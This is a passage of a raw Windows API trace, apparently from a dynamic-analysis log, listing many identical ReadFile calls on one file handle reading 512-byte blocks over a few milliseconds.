ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.968] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.969] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.970] ReadFile (in: hFile=0x58, 
lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.971] ReadFile 
(in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 
[0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.972] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, 
lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.973] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, 
lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: 
lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.990] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, 